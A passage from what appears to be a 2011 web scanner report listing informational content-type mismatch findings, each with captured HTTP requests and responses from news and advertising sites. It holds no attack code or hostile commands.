Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1; ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:15:49 GMT
Server: Apache/2.2.14 (Ubuntu)
DL_S: a202
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 168

(function(){
if(1!=4){
(new Image).src="http://amch.questionmarket.com/adsc/d909615/2/200214693346/decide.php?ord="+Math.floor((new Date()).getTime()/1000);


}
})();


28.5. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2391347&PluID=0&w=728&h=90&ord=2011.05.12.11.02.51&ucm=true HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebNewBandWidth_.bs.serving-sys.com=131%3A1303947429371; eyeblaster=BWVal=737&BWDate=40663.344456&debuglevel=&FLV=10.2154&RES=128&WMPV=0; TargetingInfo=0007g420000%5f; C4=; u2=eabf95f8-0142-429e-b9ac-2012a75d64353HU0ag; A3=iz6taL7W0bnA00001iVAzaL8z0clo00001iLxqaLMH07l000001jlP8aJjE0dpH00001iVAyaL8w0clo00001jpdKaLsn073a00002iRpfaL7W0c9M00001jz2OaLMO0cEf00001juYhaL6q07Kl00001jFU0aLQg0duS00001jFT.aLQg0duS00001kgh7aLQg02WG00001iLaRaL9K0bnA00001jBofaIOs07Si00001jAsGaJH602WG00003jelLaL7W07pd00002iRoBaLsa0c9M00001isyIaL8z02WG00001; B3=9qGw0000000002uz9wtb0000000001ur8Whx0000000003uu82s80000000002uy9oDg0000000001ut97QM0000000001uA9vHV0000000001uA9X5k0000000001uA910k0000000001uz98nW0000000001uy910n0000000001uy9c210000000002uy96EU0000000001uy8SAT0000000001uy9yEe0000000001uA9yEg0000000001uA7dOu0000000001uy

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=iz6taL7W0bnA00001iVAzaL8z0clo00001iVAyaL8w0clo00001jlP8aJjE0dpH00001iLxqaLMH07l000001iLznaM7707l000001jz2OaLMO0cEf00001iRpfaL7W0c9M00001jpdKaLsn073a00002juYhaL6q07Kl00001jFU0aLQg0duS00001jFT.aLQg0duS00001kgh7aLQg02WG00001jelLaL7W07pd00002jAsGaJH602WG00003jBofaIOs07Si00001iLaRaL9K0bnA00001iRoBaLsa0c9M00001isyIaL8z02WG00001; expires=Wed, 10-Aug-2011 07:03:16 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=82s80000000002uy8Whx0000000003uu9wtb0000000001ur9qGw0000000002uz9oDg0000000001ut97QM0000000001uA97QP0000000001uB9vHV0000000001uA910k0000000001uz9X5k0000000001uA910n0000000001uy98nW0000000001uy9c210000000002uy9yEe0000000001uA8SAT0000000001uy96EU0000000001uy7dOu0000000001uy9yEg0000000001uA; expires=Wed, 10-Aug-2011 07:03:16 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 12 May 2011 11:03:15 GMT
Connection: close
Content-Length: 1885

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

28.6. http://cdn.gotraffic.net/v/20110510_141513/images/exclusive_bar_bg_12x20.png

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn.gotraffic.net
Path:   /v/20110510_141513/images/exclusive_bar_bg_12x20.png

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png

The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /v/20110510_141513/images/exclusive_bar_bg_12x20.png HTTP/1.1
Host: cdn.gotraffic.net
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Expires: Wed, 09 May 2012 21:04:49 GMT
Cache-Control: public,max-age=31536000
Content-Type: image/png
Last-Modified: Tue, 15 Mar 2011 16:13:41 GMT
Content-Length: 69
ETag: "45-4d7f9035"
Accept-Ranges: bytes
Date: Thu, 12 May 2011 11:37:29 GMT
Connection: close

GIF89a.........Z.`.!.......,.............    ....|NV3m.[G|5.8.......P..;

28.7. http://cdn.gotraffic.net/v/20110510_141513/images/icons/chevrons.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn.gotraffic.net
Path:   /v/20110510_141513/images/icons/chevrons.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /v/20110510_141513/images/icons/chevrons.gif HTTP/1.1
Host: cdn.gotraffic.net
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Expires: Wed, 09 May 2012 21:08:24 GMT
Cache-Control: public,max-age=31536000
Content-Type: image/gif
Last-Modified: Tue, 12 Apr 2011 16:36:19 GMT
Content-Length: 116
ETag: "74-4da47f83"
Accept-Ranges: bytes
Date: Thu, 12 May 2011 11:37:29 GMT
Connection: close

.PNG
.
...IHDR.............r`l....    PLTE...........l    ....tRNS.....A....IDAT..c..`..`h..BR..Y..-....+......IEND.B`.

28.8. http://cdn.taboolasyndication.com/libtrc/bloomberg/rbox.en.4-6-15-45512.json

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn.taboolasyndication.com
Path:   /libtrc/bloomberg/rbox.en.4-6-15-45512.json

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /libtrc/bloomberg/rbox.en.4-6-15-45512.json HTTP/1.1
Host: cdn.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:41 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 12 May 2011 09:02:58 GMT
ETag: "16b8a8c-284-4a310749b9480"
Accept-Ranges: bytes
Content-Length: 644
Content-Type: text/plain; charset=UTF-8
Content-Language: en, en
Cache-Control: private, max-age=31536000
Age: 8994
Expires: Fri, 11 May 2012 09:07:47 GMT
Connection: Keep-Alive

trc_json_locale_data={"rbox":{"":{"MIME-Version":" 1.0","POT-Creation-Date":" 2009-06-03 19:30+0300","X-Poedit-SourceCharset":" utf-8","X-Poedit-Country":" ISRAEL","X-Poedit-Language":" Hebrew","Last-
...[SNIP]...

28.9. http://cgiwsc.enhancedsitebuilder.com/extras/res/js/date.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cgiwsc.enhancedsitebuilder.com
Path:   /extras/res/js/date.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /extras/res/js/date.js?cc=0.5174236237071455 HTTP/1.1
Host: cgiwsc.enhancedsitebuilder.com
Proxy-Connection: keep-alive
Referer: http://www.managedfuturespecialist.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rauth.session=8237970b60c26fc1be1f1dfe55f958e2

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:05:52 GMT
Server: Apache/2.0.63 (Debian) CM4all-ModComa/1.1(libcoma/2.6.13) JETServ/2.2.25 mod_jk2/2.0.4 mod_apreq2-20051231/2.6.0
Last-Modified: Thu, 01 Oct 2009 09:44:32 GMT
ETag: "d0945-56d5-7e928000"
Accept-Ranges: bytes
Content-Length: 22229
P3P: CP="NOI COR CURa INT"
Content-Type: application/javascript

/*
   I18N:check:1
*/
/**
* iso format: YYYY-MM-DD HH:MM:SS[..II:NN]
*/
function utcIsoToDate(utcIso,honorTimezone) {
   var year    = utcIso.substring(0, 4);
   var month    = utcIso.substring(5, 7);
   var da
...[SNIP]...

28.10. http://content.dl-rms.com/rms/3882/nodetag.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://content.dl-rms.com
Path:   /rms/3882/nodetag.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /rms/3882/nodetag.js HTTP/1.1
Host: content.dl-rms.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-AdvancedExtranetServer
Last-Modified: Thu, 08 Feb 2007 21:38:58 GMT
ETag: "c0169ff2-6f-dee18080"
Accept-Ranges: bytes
Content-Length: 111
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:15:55 GMT
Connection: close

if(Math.random()<1) document.write('<scr'+'ipt src="http://content.dl-rms.com/dt/s/3882/s.js"></scr'+'ipt>');

28.11. http://dealbook.nytimes.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://dealbook.nytimes.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: dealbook.nytimes.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; adxcl=t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*18a4b=0:1; nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; __utmz=30321962.1305198204.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305198204263:ss=1305198204263; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; __utma=30321962.1644030145.1305198192.1305198192.1305198192.1; __utmc=30321962; __utmb=30321962.2.10.1305198192; _chartbeat2=gi367p67ehp7835r

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:06:12 GMT
Server: Apache
Last-Modified: Wed, 11 May 2011 17:05:31 GMT
ETag: "100a53-37e-4a303147fecc0"
Accept-Ranges: bytes
ntCoent-Length: 894
Cneonction: close
Content-Type: text/plain; charset=UTF-8
Cache-Control: private
Content-Length: 894

..............h.......(....... ......................................................................................................................................................................
...[SNIP]...

28.12. http://dealbook.nytimes.com/proxy/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://dealbook.nytimes.com
Path:   /proxy/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /proxy/?type=twitter&widget_id=4&sidebar_id=sidebar-2&widget_name=nyt-twitter HTTP/1.1
Host: dealbook.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; rsi_segs=D08734_70008|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305112816444:ss=1305112015513; adxcl=t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*18a4b=0:1; nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:04:04 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 34170

NYTD.TwitterReader.callback([{"text":"Raj lawyer: \"We'll see you in the Second Circuit.\" We'll hear lots more about the wiretap application there.","created_at":"Wed May 11 19:54:03 +0000 2011","sou
...[SNIP]...

28.13. http://dealbook.nytimes.com/svc/community/V2/requestHandler

Summary

Severity:   Information
Confidence:   Firm
Host:   http://dealbook.nytimes.com
Path:   /svc/community/V2/requestHandler

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain JSON.

Request

POST /svc/community/V2/requestHandler HTTP/1.1
Host: dealbook.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
Origin: http://dealbook.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; rsi_segs=D08734_70008|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305112816444:ss=1305112015513; adxcl=t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*18a4b=0:1; nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1
Content-Length: 1507

requestData=%7B%22userContentSummary%22%3A%7B%22request%22%3A%7B%22requestType%22%3A%22UserContentSummary%22%2C%22status%22%3A%22was-approved%22%2C%22url%22%3A%22http%3A%2F%2Fdealbook.nytimes.com%2F20
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Thu, 12 May 2011 11:03:48 GMT
Content-Type: text/plain; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Expires: Sat, 01 Jan 2000 05:00:00 GMT
Last-Modified: Thu, 12 May 2011 11:03:48 GMT
Cache-Control: no-cache
Pragma: no-cache
Cteonnt-Length: 1689
Content-Length: 1689


{"userContentSummary":{"request":{"requestType":"UserContentSummary","status":"was-approved","url":"http:\/\/dealbook.nytimes.com\/2011\/05\/09\/private-equity-has-a-horse-in-this-race\/"},"respons
...[SNIP]...

28.14. http://dealbook.nytimes.com/svc/timespeople/bell.html

Summary

Severity:   Information
Confidence:   Firm
Host:   http://dealbook.nytimes.com
Path:   /svc/timespeople/bell.html

Issue detail

The response contains the following Content-type statement:

Content-type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /svc/timespeople/bell.html HTTP/1.1
Host: dealbook.nytimes.com
Proxy-Connection: keep-alive
Referer: http://timespeople.nytimes.com/packages/html/timespeople/xmlhttprequest.html?url=%2Fsvc%2Ftimespeople%2Ftoolbar%2F1.0%2Fuser%3Fpage_url%3Dhttp%3A%2F%2Fdealbook.nytimes.com%2F2011%2F05%2F09%2Fprivate-equity-has-a-horse-in-this-race%2F&method=get&params=&bell=http://dealbook.nytimes.com/svc/timespeople/bell.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; rsi_segs=D08734_70008|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305112816444:ss=1305112015513; adxcl=t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*18a4b=0:1; nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 11:03:12 GMT
Content-type: text/html
Cache-Control: private
Content-Length: 54

<!-- This file is used by NewsPeple. Do not delete -->

28.15. http://j.maxmind.com/app/geoip.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://j.maxmind.com
Path:   /app/geoip.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /app/geoip.js HTTP/1.1
Host: j.maxmind.com
Proxy-Connection: keep-alive
Referer: http://livetechtv.com/survey/c/indexns.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:02:09 GMT
Expires: Thu, 12 May 2011 12:32:09 GMT
Cache-Control: private
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 504
X-Req-Start: t=1305201729586860
X-Req-Proc: D=286
Connection: close
X-Pad: avoid browser bug

function geoip_country_code() { return 'US'; }
function geoip_country_name() { return 'United States'; }
function geoip_city() { return 'Dallas'; }
function geoip_region() { return 'TX';
...[SNIP]...

28.16. http://kona40.kontera.com/KonaGet.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://kona40.kontera.com
Path:   /KonaGet.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /KonaGet.js?u=1305200280719&p=134803&k=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/jpNNP3&al=1&l=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/&t=Ted+Forstmann+Being+Treated+for+Brain+Cancer+-+FoxBusiness.com&m1=recession+%2C+Henry+Kravis+%2C+RJR+Nabisco+%2C+junk+bonds+%2C+Padma+Lakshmi+%2C+FOX+Business+Network+%2C+private+equity+%2C+FOX+&rId=0&prev_page=http%3A//dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/&rl=0&1=14&mod=536936450&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.2%20r154|user_|session_ HTTP/1.1
Host: kona40.kontera.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=1989E06E-70CA-11E0-8B1B-AA0011BCA051; cluid=-12035860971305125961969; imprs=1

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 1504

konaSafe(function(){
reJsonResponse({"AutoReport":{},"konaLat":"32.7825012","konaLon":"-96.8207016","konaPostalCode":"75207","publisherParams":{"all_except":"1","infoUnit.dc_open_new_win":"yes","tags_
...[SNIP]...

28.17. http://labs.csscorp.com/site/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://labs.csscorp.com
Path:   /site/favicon.ico

Issue detail

The response contains the following Content-type statement: The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /site/favicon.ico HTTP/1.1
Host: labs.csscorp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: csscorp=173.193.214.243.1305201370918613; __utma=202015363.216220317.1305202210.1305202210.1305202210.1; __utmc=202015363; __utmz=202015363.1305202210.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LOOPFUSE=9508c8ea-cfac-4a9a-8137-aeaa3d55f0e1; wp1090=UTCTDDDDDDTVYCAU; __utma=198546482.1077941423.1305205936.1305205936.1305205936.1; __utmb=198546482.1.10.1305205936; __utmc=198546482; __utmz=198546482.1305205936.1.1.utmcsr=csscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:12:16 GMT
Server: Apache
Last-Modified: Fri, 29 Apr 2011 06:48:35 GMT
ETag: "3cb4af-47e-4a209101416c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 1150

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

28.18. http://markets.on.nytimes.com/research/modules/dealbook_2010/dealbook.asp

Summary

Severity:   Information
Confidence:   Firm
Host:   http://markets.on.nytimes.com
Path:   /research/modules/dealbook_2010/dealbook.asp

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /research/modules/dealbook_2010/dealbook.asp?18 HTTP/1.1
Host: markets.on.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
